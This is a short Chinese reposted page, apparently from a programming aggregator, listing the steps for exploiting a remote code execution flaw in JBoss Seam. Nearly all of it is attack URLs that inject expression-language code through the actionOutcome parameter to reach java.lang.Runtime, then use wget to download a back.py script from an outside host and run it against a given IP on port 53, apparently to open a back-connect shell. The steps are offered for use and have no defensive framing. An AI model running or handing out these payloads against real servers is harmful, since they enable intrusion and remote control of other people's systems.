目标:http://www.ip.com
http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478
http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName
('java.lang.Runtime').getDeclaredMethods()[6]}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName
('java.lang.Runtime')}.getDeclaredMethods()[13]}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName
('java.lang.Runtime').getDeclaredMethods()[13].invoke(Expressions.getClass().forname
('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),'wget http://www.bitpress.com.cn/uploads/back.py -O
/tmp/back.py')}
home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{Expressions.getClass().forname
('java.lang.Runtime').getDeclaredMethods()[13].invoke(Expressions.getClass().forname
('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),'perl /tmp/back.py 118.122.176.42 53')}
总结以上是内存溢出为你收集整理的jboss seam 远程执行漏洞利用步骤全部内容,希望文章能够帮你解决jboss seam 远程执行漏洞利用步骤所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)